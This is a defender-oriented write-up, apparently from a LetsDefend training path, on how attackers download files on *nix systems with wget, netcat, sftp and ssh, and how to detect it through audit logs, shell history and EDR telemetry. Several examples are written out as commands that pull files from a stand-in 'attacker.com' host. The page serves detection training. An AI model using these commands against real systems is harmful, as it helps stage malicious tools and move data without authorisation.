> For the complete documentation index, see [llms.txt](https://karim-ashraf.gitbook.io/karim_ashraf_space/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/lets-defend/incident-responder-path/gtfobins/file-download.md).

# File Download

## File Download in nix Systems: Tools and Detection

Attackers frequently use standard \*nix utilities to download malicious tools or exfiltrate sensitive files. Below are common methods and detection strategies for identifying unauthorized file downloads.

***

## **Key Commands for File Download**

### **1. wget Command**

**Purpose**: Download files from web servers.

**Example**:

```bash
URL=http://attacker.com/file_to_get  
LFILE=file_to_save  
wget $URL -O $LFILE
```

**Detection**:

* Focus on the **`-O`** parameter, which specifies the output file.
* Verify if the destination (IP/domain) is trusted.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "wget" | grep "\-O"
  ```
* **Command History**:

  ```bash
  history | grep "wget" | grep "\-O"
  cat ~/.bash_history | grep "wget" | grep "\-O"
  ```
* **EDR/XDR Logs**: Inspect **wget** processes and associated network traffic for unauthorized connections.

### **2. nc (Netcat) Command**

**Purpose**: Transfer files using TCP or UDP.

**Example**:

*On the remote system*:

```bash
nc target.com 12345 < "file_to_send"
```

*On the target system*:

```bash
LPORT=12345  
LFILE=file_to_save  
nc -l -p $LPORT > "$LFILE"
```

**Detection**:

* Look for **`-l`** (listen mode) and **`>`** operator to detect incoming file streams.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "nc" | grep "\-l"
  ```
* **Command History**:

  ```bash
  history | grep "nc" | grep "\-l"
  cat ~/.bash_history | grep "nc" | grep "\-l"
  ```
* **EDR/XDR Logs**: Analyze **nc** processes and network activity for unauthorized file transfers.

### **3. sftp Command**

**Purpose**: Secure file transfer over SSH.

**Example**:

```bash
RHOST=user@attacker.com  
sftp $RHOST  
get file_to_get file_to_save
```

**Detection**:

* Focus on **get** operations for file downloads.
* Verify the legitimacy of remote destinations.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "sftp"
  ```
* **Command History**:

  ```bash
  history | grep "sftp"
  cat ~/.bash_history | grep "sftp"
  ```
* **EDR/XDR Logs**: Investigate **sftp** processes and network connections.

### **4. ssh Command**

**Purpose**: Execute remote commands, including file transfers.

**Example**:

```bash
HOST=user@attacker.com  
RPATH=file_to_get  
LPATH=file_to_save  
ssh $HOST "cat $RPATH" > $LPATH
```

**Detection**:

* Monitor the **`>`** operator in conjunction with remote file viewing commands like **cat**.

**Detection Methods**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "ssh"
  ```
* **Command History**:

  ```bash
  history | grep "ssh"
  cat ~/.bash_history | grep "ssh"
  ```
* **EDR/XDR Logs**: Examine **ssh** process events and parameters for unauthorized file retrievals.

***

## **General Detection Strategies**

### **1. Monitor Known Tools**

* Regularly log and review commands like **wget**, **nc**, **sftp**, and **ssh**.
* Pay close attention to connections with external or suspicious domains.

### **2. Check Network Traffic**

* Analyze outbound connections, especially to untrusted IPs or domains.
* Use network monitoring tools to flag uncommon destinations or large data transfers.

### **3. Audit Logs**

* Regularly review **`/var/log/audit/audit.log`** for download-related commands.

### **4. Command History**

* Inspect history files for any download-related activities.

  ```bash
  history | grep [command]
  cat ~/.bash_history | grep [command]
  ```

### **5. EDR/XDR Telemetry**

* Utilize endpoint detection tools to:
  * Correlate process events with network connections.
  * Detect and flag unauthorized file transfer patterns.

***

## **Key Points**

While utilities like **wget**, **nc**, **sftp**, and **ssh** serve legitimate purposes, they are often exploited for malicious file downloads. **Continuous monitoring**, combined with thorough log analysis and EDR/XDR telemetry, is essential to identify and mitigate these threats effectively. By proactively implementing these strategies, defenders can strengthen their security posture against unauthorized file transfer activities.
